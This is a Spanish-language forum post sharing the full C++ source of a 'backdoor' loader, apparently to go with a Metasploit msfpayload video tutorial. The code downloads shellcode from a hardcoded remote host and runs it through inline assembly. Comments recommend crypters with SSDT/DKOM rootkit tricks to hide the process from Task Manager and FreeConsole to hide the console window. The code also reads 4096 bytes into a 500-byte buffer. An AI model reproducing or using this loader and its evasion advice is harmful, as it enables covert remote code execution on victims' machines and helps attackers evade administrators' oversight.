C++ Advanced Backdoor

Hola a todos les comparto el siguiente video tutorial aqui utilizamos metasploit msfpayload recuerden que donde esta el archivo.bin es el backdoor . ustedes pueden hacerlo con archivos backdoor.exe tambien

//No crea archivos temporales en el sistema
//EL proceso es visto por el administrador de tareas pero se puede ocultar facilmente si lo pasan por un builder o crypter que tenga la opcion SSDT o DKOM para olcultarlo del administrador de tareas y process explorer y muchos mas es la imaginacion

Código:

   //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
   #include <windows.h>
   #include<iostream>
   #include<cstring>
   #include<Wininet.h>
   using namespace std;
   //this is a buffer with shellcode data in .bss section
   unsigned char DataReceived[500];
   int main(){
   int i;
   //this configure a HTTP agent to surf
   HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
   //if for validate connection.
   if(!connect){
   cout<<"Connection Failed or Syntax error";
   return 0;
   }
   //Open a malicious url
   HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);

   //this check the handler for URL
   if ( !OpenAddress )
   {
   DWORD ErrorNum = GetLastError();
   cout<<"Failed to open URL \nError No: "<<ErrorNum;
   InternetCloseHandle(connect);
   return 0;
   }


   DWORD NumberOfBytesRead = 0;

   //this recovery a file on server and save data into DataReceived
   while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
   {
   //this print the data in format \x00 you can delete this routine
   for(i=0;i<sizeof DataReceived; i++ ){

   printf("\\x%02x",DataReceived[i]);

   }
   /*this routine is a other implementattion of shellcode-test but in this routine i use __asm () directive for call asm intrucctions.
   1)first i store a pointer to buffer in EAX register
   2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
   3)the ret instruction put the value of esp+4 into eip and pass the execution.
   4)finally the shellcode in DataReceived is executed
   5)all handler is closed.
   NOTA:
   you can put a nopsled before shellcode for estabilish execution .
   use freeconsole for hidden a Dos Windows
   */
   __asm ("lea _DataReceived, %eax");
   __asm ("push %eax");
   __asm ("ret");
   }

   InternetCloseHandle(OpenAddress);
   InternetCloseHandle(connect);

   return 0;
   }